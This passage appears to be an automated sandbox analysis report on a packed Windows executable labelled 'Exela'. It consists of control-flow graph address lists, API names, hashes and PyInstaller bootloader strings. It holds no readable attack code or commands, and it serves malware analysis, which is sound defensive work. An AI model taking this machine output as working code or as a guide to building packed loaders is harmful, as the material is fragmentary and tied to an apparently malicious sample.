                                                                                                    control_flow_graph 0 7ff75ae91000-7ff75ae93806 call 7ff75ae9fe88 call 7ff75ae9fe90 call 7ff75ae9c8c0 call 7ff75aea5460 call 7ff75aea54f4 call 7ff75ae936b0 14 7ff75ae93814-7ff75ae93836 call 7ff75ae91950 0->14 15 7ff75ae93808-7ff75ae9380f 0->15 20 7ff75ae9391b-7ff75ae93931 call 7ff75ae945b0 14->20 21 7ff75ae9383c-7ff75ae93856 call 7ff75ae91c80 14->21 16 7ff75ae93c97-7ff75ae93cb2 call 7ff75ae9c5c0 15->16 28 7ff75ae93933-7ff75ae93960 call 7ff75ae97f80 20->28 29 7ff75ae9396a-7ff75ae9397f call 7ff75ae92710 20->29 25 7ff75ae9385b-7ff75ae9389b call 7ff75ae98a20 21->25 34 7ff75ae938c1-7ff75ae938cc call 7ff75aea4fa0 25->34 35 7ff75ae9389d-7ff75ae938a3 25->35 41 7ff75ae93962-7ff75ae93965 call 7ff75aea00bc 28->41 42 7ff75ae93984-7ff75ae939a6 call 7ff75ae91c80 28->42 37 7ff75ae93c8f 29->37 49 7ff75ae938d2-7ff75ae938e1 call 7ff75ae98a20 34->49 50 7ff75ae939fc-7ff75ae93a2a call 7ff75ae98b30 call 7ff75ae98b90 * 3 34->50 38 7ff75ae938af-7ff75ae938bd call 7ff75ae98b90 35->38 39 7ff75ae938a5-7ff75ae938ad 35->39 37->16 38->34 39->38 41->29 52 7ff75ae939b0-7ff75ae939b9 42->52 57 7ff75ae939f4-7ff75ae939f7 call 7ff75aea4fa0 49->57 58 7ff75ae938e7-7ff75ae938ed 49->58 76 7ff75ae93a2f-7ff75ae93a3e call 7ff75ae98a20 50->76 52->52 56 7ff75ae939bb-7ff75ae939d8 call 7ff75ae91950 52->56 56->25 68 7ff75ae939de-7ff75ae939ef call 7ff75ae92710 56->68 57->50 61 7ff75ae938f0-7ff75ae938fc 58->61 65 7ff75ae93905-7ff75ae93908 61->65 66 7ff75ae938fe-7ff75ae93903 61->66 65->57 69 7ff75ae9390e-7ff75ae93916 call 7ff75aea4fa0 65->69 66->61 66->65 68->37 69->76 79 7ff75ae93a44-7ff75ae93a47 76->79 80 7ff75ae93b45-7ff75ae93b53 76->80 79->80 83 7ff75ae93a4d-7ff75ae93a50 79->83 81 7ff75ae93a67 80->81 82 7ff75ae93b59-7ff75ae93b5d 80->82 84 7ff75ae93a6b-7ff75ae93a90 call 7ff75aea4fa0 81->84 82->84 85 7ff75ae93b14-7ff75ae93b17 83->85 86 7ff75ae93a56-7ff75ae93a5a 83->86 94 7ff75ae93a92-7ff75ae93aa6 call 7ff75ae98b30 84->94 95 7ff75ae93aab-7ff75ae93ac0 84->95 89 7ff75ae93b2f-7ff75ae93b40 call 7ff75ae92710 85->89 90 7ff75ae93b19-7ff75ae93b1d 85->90 86->85 88 7ff75ae93a60 86->88 88->81 98 7ff75ae93c7f-7ff75ae93c87 89->98 90->89 93 7ff75ae93b1f-7ff75ae93b2a 90->93 93->84 94->95 99 7ff75ae93ac6-7ff75ae93aca 95->99 100 7ff75ae93be8-7ff75ae93bfa call 7ff75ae98a20 95->100 98->37 102 7ff75ae93ad0-7ff75ae93ae8 call 7ff75aea52c0 99->102 103 7ff75ae93bcd-7ff75ae93be2 call 7ff75ae91940 99->103 108 7ff75ae93bfc-7ff75ae93c02 100->108 109 7ff75ae93c2e 100->109 113 7ff75ae93b62-7ff75ae93b7a call 7ff75aea52c0 102->113 114 7ff75ae93aea-7ff75ae93b02 call 7ff75aea52c0 102->114 103->99 103->100 111 7ff75ae93c04-7ff75ae93c1c 108->111 112 7ff75ae93c1e-7ff75ae93c2c 108->112 115 7ff75ae93c31-7ff75ae93c40 call 7ff75aea4fa0 109->115 111->115 112->115 122 7ff75ae93b87-7ff75ae93b9f call 7ff75aea52c0 113->122 123 7ff75ae93b7c-7ff75ae93b80 113->123 114->103 124 7ff75ae93b08-7ff75ae93b0f 114->124 125 7ff75ae93d41-7ff75ae93d63 call 7ff75ae944d0 115->125 126 7ff75ae93c46-7ff75ae93c4a 115->126 139 7ff75ae93ba1-7ff75ae93ba5 122->139 140 7ff75ae93bac-7ff75ae93bc4 call 7ff75aea52c0 122->140 123->122 124->103 137 7ff75ae93d71-7ff75ae93d82 call 7ff75ae91c80 125->137 138 7ff75ae93d65-7ff75ae93d6f call 7ff75ae94620 125->138 129 7ff75ae93c50-7ff75ae93c5f call 7ff75ae990e0 126->129 130 7ff75ae93cd4-7ff75ae93ce6 call 7ff75ae98a20 126->130 141 7ff75ae93c61 129->141 142 7ff75ae93cb3-7ff75ae93cbd call 7ff75ae98850 129->142 143 7ff75ae93d35-7ff75ae93d3c 130->143 144 7ff75ae93ce8-7ff75ae93ceb 130->144 151 7ff75ae93d87-7ff75ae93d96 137->151 138->151 139->140 140->103 154 7ff75ae93bc6 140->154 148 7ff75ae93c68 call 7ff75ae92710 141->148 164 7ff75ae93cbf-7ff75ae93cc6 142->164 165 7ff75ae93cc8-7ff75ae93ccf 142->165 143->148 144->143 149 7ff75ae93ced-7ff75ae93d10 call 7ff75ae91c80 144->149 160 7ff75ae93c6d-7ff75ae93c77 148->160 166 7ff75ae93d12-7ff75ae93d26 call 7ff75ae92710 call 7ff75aea4fa0 149->166 167 7ff75ae93d2b-7ff75ae93d33 call 7ff75aea4fa0 149->167 157 7ff75ae93dc4-7ff75ae93dda call 7ff75ae99400 151->157 158 7ff75ae93d98-7ff75ae93d9f 151->158 154->103 172 7ff75ae93de8-7ff75ae93e04 SetDllDirectoryW 157->172 173 7ff75ae93ddc 157->173 158->157 162 7ff75ae93da1-7ff75ae93da5 158->162 160->98 162->157 168 7ff75ae93da7-7ff75ae93dbe SetDllDirectoryW LoadLibraryExW 162->168 164->148 165->151 166->160 167->151 168->157 174 7ff75ae93f01-7ff75ae93f08 172->174 175 7ff75ae93e0a-7ff75ae93e19 call 7ff75ae98a20 172->175 173->172 180 7ff75ae93ffc-7ff75ae94004 174->180 181 7ff75ae93f0e-7ff75ae93f15 174->181 188 7ff75ae93e32-7ff75ae93e3c call 7ff75aea4fa0 175->188 189 7ff75ae93e1b-7ff75ae93e21 175->189 185 7ff75ae94006-7ff75ae94023 PostMessageW GetMessageW 180->185 186 7ff75ae94029-7ff75ae9403e call 7ff75ae936a0 call 7ff75ae93360 call 7ff75ae93670 180->186 181->180 184 7ff75ae93f1b-7ff75ae93f25 call 7ff75ae933c0 181->184 184->160 196 7ff75ae93f2b-7ff75ae93f3f call 7ff75ae990c0 184->196 185->186 209 7ff75ae94043-7ff75ae9405b call 7ff75ae96fb0 call 7ff75ae96d60 186->209 201 7ff75ae93ef2-7ff75ae93efc call 7ff75ae98b30 188->201 202 7ff75ae93e42-7ff75ae93e48 188->202 193 7ff75ae93e23-7ff75ae93e2b 189->193 194 7ff75ae93e2d-7ff75ae93e2f 189->194 193->194 194->188 207 7ff75ae93f41-7ff75ae93f5e PostMessageW GetMessageW 196->207 208 7ff75ae93f64-7ff75ae93fa7 call 7ff75ae98b30 call 7ff75ae98bd0 call 7ff75ae96fb0 call 7ff75ae96d60 call 7ff75ae98ad0 196->208 201->174 202->201 206 7ff75ae93e4e-7ff75ae93e54 202->206 210 7ff75ae93e5f-7ff75ae93e61 206->210 211 7ff75ae93e56-7ff75ae93e58 206->211 207->208 248 7ff75ae93fe9-7ff75ae93ff7 call 7ff75ae91900 208->248 249 7ff75ae93fa9-7ff75ae93fb3 call 7ff75ae99200 208->249 210->174 212 7ff75ae93e67-7ff75ae93e83 call 7ff75ae96db0 call 7ff75ae97330 210->212 211->212 215 7ff75ae93e5a 211->215 227 7ff75ae93e85-7ff75ae93e8c 212->227 228 7ff75ae93e8e-7ff75ae93e95 212->228 215->174 230 7ff75ae93edb-7ff75ae93ef0 call 7ff75ae92a50 call 7ff75ae96fb0 call 7ff75ae96d60 227->230 231 7ff75ae93eaf-7ff75ae93eb9 call 7ff75ae971a0 228->231 232 7ff75ae93e97-7ff75ae93ea4 call 7ff75ae96df0 228->232 230->174 244 7ff75ae93ec4-7ff75ae93ed2 call 7ff75ae974e0 231->244 245 7ff75ae93ebb-7ff75ae93ec2 231->245 232->231 243 7ff75ae93ea6-7ff75ae93ead 232->243 243->230 244->174 255 7ff75ae93ed4 244->255 245->230 248->160 249->248 259 7ff75ae93fb5-7ff75ae93fca 249->259 255->230 260 7ff75ae93fe4 call 7ff75ae92a50 259->260 261 7ff75ae93fcc-7ff75ae93fdf call 7ff75ae92710 call 7ff75ae91900 259->261 260->248 261->160
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastModuleName
                                                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                    • API String ID: 2776309574-4232158417
                                                                                                    • Opcode ID: ddc291d86b75269440f3daa8f744d6720b4cd70a3da464c6c37514ecf772ef01
                                                                                                    • Instruction ID: b69eaa1dd3331475563e73e66bf5e4f1996367c321b0537a7c0a8e22d49e240b
                                                                                                    • Opcode Fuzzy Hash: ddc291d86b75269440f3daa8f744d6720b4cd70a3da464c6c37514ecf772ef01
                                                                                                    • Instruction Fuzzy Hash: F932AF21A0C7A759FA24B720945A7F9E691AF44B84FCC41B6DA5D432D2EF3CE954C330
                                                                                                    Function 00007FF75AEB69D4 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 465 7ff75aeb69d4-7ff75aeb6a47 call 7ff75aeb6708 468 7ff75aeb6a61-7ff75aeb6a6b call 7ff75aea8590 465->468 469 7ff75aeb6a49-7ff75aeb6a52 call 7ff75aea4f58 465->469 475 7ff75aeb6a86-7ff75aeb6aef CreateFileW 468->475 476 7ff75aeb6a6d-7ff75aeb6a84 call 7ff75aea4f58 call 7ff75aea4f78 468->476 474 7ff75aeb6a55-7ff75aeb6a5c call 7ff75aea4f78 469->474 488 7ff75aeb6da2-7ff75aeb6dc2 474->488 479 7ff75aeb6af1-7ff75aeb6af7 475->479 480 7ff75aeb6b6c-7ff75aeb6b77 GetFileType 475->480 476->474 485 7ff75aeb6b39-7ff75aeb6b67 GetLastError call 7ff75aea4eec 479->485 486 7ff75aeb6af9-7ff75aeb6afd 479->486 482 7ff75aeb6b79-7ff75aeb6bb4 GetLastError call 7ff75aea4eec CloseHandle 480->482 483 7ff75aeb6bca-7ff75aeb6bd1 480->483 482->474 499 7ff75aeb6bba-7ff75aeb6bc5 call 7ff75aea4f78 482->499 491 7ff75aeb6bd3-7ff75aeb6bd7 483->491 492 7ff75aeb6bd9-7ff75aeb6bdc 483->492 485->474 486->485 493 7ff75aeb6aff-7ff75aeb6b37 CreateFileW 486->493 497 7ff75aeb6be2-7ff75aeb6c37 call 7ff75aea84a8 491->497 492->497 498 7ff75aeb6bde 492->498 493->480 493->485 503 7ff75aeb6c56-7ff75aeb6c87 call 7ff75aeb6488 497->503 504 7ff75aeb6c39-7ff75aeb6c45 call 7ff75aeb6910 497->504 498->497 499->474 511 7ff75aeb6c89-7ff75aeb6c8b 503->511 512 7ff75aeb6c8d-7ff75aeb6ccf 503->512 504->503 510 7ff75aeb6c47 504->510 513 7ff75aeb6c49-7ff75aeb6c51 call 7ff75aeaab30 510->513 511->513 514 7ff75aeb6cf1-7ff75aeb6cfc 512->514 515 7ff75aeb6cd1-7ff75aeb6cd5 512->515 513->488 518 7ff75aeb6d02-7ff75aeb6d06 514->518 519 7ff75aeb6da0 514->519 515->514 517 7ff75aeb6cd7-7ff75aeb6cec 515->517 517->514 518->519 520 7ff75aeb6d0c-7ff75aeb6d51 CloseHandle CreateFileW 518->520 519->488 522 7ff75aeb6d86-7ff75aeb6d9b 520->522 523 7ff75aeb6d53-7ff75aeb6d81 GetLastError call 7ff75aea4eec call 7ff75aea86d0 520->523 522->519 523->522
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                    • String ID:
                                                                                                    • API String ID: 1617910340-0
                                                                                                    • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                    • Instruction ID: ee3efea50d0d48c4bde0f0a6c6a8b7b33c35aff29d8b17df749b4ce14cdfd268
                                                                                                    • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                    • Instruction Fuzzy Hash: 20C1EF32B28A6986FB10EFA4C4962AC7761FB49B98F885375DB6E57394CF38D411C310
                                                                                                    Function 00007FFB084A3230 Relevance: 6.8, APIs: 4, Instructions: 850librarymemoryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2098176048.00007FFB084A3000.00000080.00000001.01000000.00000019.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2097383828.00007FFB08150000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB08151000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB0815D000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB081B5000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB081C9000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB081D9000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB081ED000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB0839C000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB0839E000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB083C9000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB083FA000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB08420000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB0846E000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB08474000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB08476000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB08492000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097411781.00007FFB0849F000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2098205851.00007FFB084A4000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ffb08150000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3300690313-0
                                                                                                    • Opcode ID: 6912a145b092a435b2690e8e050799ca64382d8315b3fc9a28e3f91c66e0900d
                                                                                                    • Instruction ID: f6f7f8a1d68be3448ac3b683d61e5545b7b9317e54edcdc768debc1b173d51ba
                                                                                                    • Opcode Fuzzy Hash: 6912a145b092a435b2690e8e050799ca64382d8315b3fc9a28e3f91c66e0900d
                                                                                                    • Instruction Fuzzy Hash: A46225B262819286E7198F39D80067DB7A0F758785F045536EA9ECB7C4FA3CEB45CB04
                                                                                                    Function 00007FF75AE992F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 2295610775-0
                                                                                                    • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                    • Instruction ID: d28007797e316ee1e134623854a8434a5f6d3804ae729b7e3fa2ae69a2b0a515
                                                                                                    • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                    • Instruction Fuzzy Hash: 57F0C822A187518AF760BF60B45A76AB350AF84324F8C4335D9AD027E4DF3CD4488A10
                                                                                                    Function 00007FF75AE91950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 267 7ff75ae91950-7ff75ae9198b call 7ff75ae945b0 270 7ff75ae91991-7ff75ae919d1 call 7ff75ae97f80 267->270 271 7ff75ae91c4e-7ff75ae91c72 call 7ff75ae9c5c0 267->271 276 7ff75ae919d7-7ff75ae919e7 call 7ff75aea0744 270->276 277 7ff75ae91c3b-7ff75ae91c3e call 7ff75aea00bc 270->277 282 7ff75ae91a08-7ff75ae91a24 call 7ff75aea040c 276->282 283 7ff75ae919e9-7ff75ae91a03 call 7ff75aea4f78 call 7ff75ae92910 276->283 280 7ff75ae91c43-7ff75ae91c4b 277->280 280->271 289 7ff75ae91a45-7ff75ae91a5a call 7ff75aea4f98 282->289 290 7ff75ae91a26-7ff75ae91a40 call 7ff75aea4f78 call 7ff75ae92910 282->290 283->277 296 7ff75ae91a7b-7ff75ae91afc call 7ff75ae91c80 * 2 call 7ff75aea0744 289->296 297 7ff75ae91a5c-7ff75ae91a76 call 7ff75aea4f78 call 7ff75ae92910 289->297 290->277 309 7ff75ae91b01-7ff75ae91b14 call 7ff75aea4fb4 296->309 297->277 312 7ff75ae91b35-7ff75ae91b4e call 7ff75aea040c 309->312 313 7ff75ae91b16-7ff75ae91b30 call 7ff75aea4f78 call 7ff75ae92910 309->313 319 7ff75ae91b6f-7ff75ae91b8b call 7ff75aea0180 312->319 320 7ff75ae91b50-7ff75ae91b6a call 7ff75aea4f78 call 7ff75ae92910 312->320 313->277 327 7ff75ae91b8d-7ff75ae91b99 call 7ff75ae92710 319->327 328 7ff75ae91b9e-7ff75ae91bac 319->328 320->277 327->277 328->277 329 7ff75ae91bb2-7ff75ae91bb9 328->329 333 7ff75ae91bc1-7ff75ae91bc7 329->333 334 7ff75ae91be0-7ff75ae91bef 333->334 335 7ff75ae91bc9-7ff75ae91bd6 333->335 334->334 336 7ff75ae91bf1-7ff75ae91bfa 334->336 335->336 337 7ff75ae91c0f 336->337 338 7ff75ae91bfc-7ff75ae91bff 336->338 340 7ff75ae91c11-7ff75ae91c24 337->340 338->337 339 7ff75ae91c01-7ff75ae91c04 338->339 339->337 341 7ff75ae91c06-7ff75ae91c09 339->341 342 7ff75ae91c26 340->342 343 7ff75ae91c2d-7ff75ae91c39 340->343 341->337 344 7ff75ae91c0b-7ff75ae91c0d 341->344 342->343 343->277 343->333 344->340
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF75AE97F80: _fread_nolock.LIBCMT ref: 00007FF75AE9802A
                                                                                                    • _fread_nolock.LIBCMT ref: 00007FF75AE91A1B
                                                                                                      • Part of subcall function 00007FF75AE92910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF75AE91B6A), ref: 00007FF75AE9295E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _fread_nolock$CurrentProcess
                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                    • API String ID: 2397952137-3497178890
                                                                                                    • Opcode ID: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
                                                                                                    • Instruction ID: 58affc7623e1bb6c5573197db563d731b501ef89910778927b89facaf8a57c6b
                                                                                                    • Opcode Fuzzy Hash: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
                                                                                                    • Instruction Fuzzy Hash: D481D671A0C7A68AFB60FB14D4466F9A390EF48784FC84171EA4D43786DE3CE5858760
                                                                                                    Function 00007FF75AE91470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                    • Opcode ID: 42b8736eca5e8aaffec84b6365213ab165e73849c65a2b46650c6e074acc8ace
                                                                                                    • Instruction ID: daacebb6bab56183e429a75c802b04264cf0a841dce7126223a33933d15c84f3
                                                                                                    • Opcode Fuzzy Hash: 42b8736eca5e8aaffec84b6365213ab165e73849c65a2b46650c6e074acc8ace
                                                                                                    • Instruction Fuzzy Hash: 79417321A087669AFB10FB2198469B9E390FF44794FCC4572EE5D07B95DE3CE5418720
                                                                                                    Function 00007FF75AE91210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 528 7ff75ae91210-7ff75ae9126d call 7ff75ae9bdf0 531 7ff75ae9126f-7ff75ae91296 call 7ff75ae92710 528->531 532 7ff75ae91297-7ff75ae912af call 7ff75aea4fb4 528->532 537 7ff75ae912b1-7ff75ae912cf call 7ff75aea4f78 call 7ff75ae92910 532->537 538 7ff75ae912d4-7ff75ae912e4 call 7ff75aea4fb4 532->538 550 7ff75ae91439-7ff75ae9146d call 7ff75ae9bad0 call 7ff75aea4fa0 * 2 537->550 544 7ff75ae912e6-7ff75ae91304 call 7ff75aea4f78 call 7ff75ae92910 538->544 545 7ff75ae91309-7ff75ae9131b 538->545 544->550 546 7ff75ae91320-7ff75ae91345 call 7ff75aea040c 545->546 557 7ff75ae91431 546->557 558 7ff75ae9134b-7ff75ae91355 call 7ff75aea0180 546->558 557->550 558->557 564 7ff75ae9135b-7ff75ae91367 558->564 566 7ff75ae91370-7ff75ae91385 call 7ff75ae9a230 564->566 568 7ff75ae9138a-7ff75ae91398 566->568 569 7ff75ae91416-7ff75ae9142c call 7ff75ae92710 568->569 570 7ff75ae9139a-7ff75ae9139d 568->570 569->557 572 7ff75ae9139f-7ff75ae913a9 570->572 573 7ff75ae91411 570->573 574 7ff75ae913d4-7ff75ae913d7 572->574 575 7ff75ae913ab-7ff75ae913c1 call 7ff75aea0b4c 572->575 573->569 577 7ff75ae913d9-7ff75ae913e7 call 7ff75aeb9ea0 574->577 578 7ff75ae913ea-7ff75ae913ef 574->578 582 7ff75ae913cf-7ff75ae913d2 575->582 583 7ff75ae913c3-7ff75ae913cd call 7ff75aea0180 575->583 577->578 578->566 581 7ff75ae913f5-7ff75ae913f8 578->581 585 7ff75ae913fa-7ff75ae913fd 581->585 586 7ff75ae9140c-7ff75ae9140f 581->586 582->569 583->578 583->582 585->569 588 7ff75ae913ff-7ff75ae91407 585->588 586->557 588->546
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
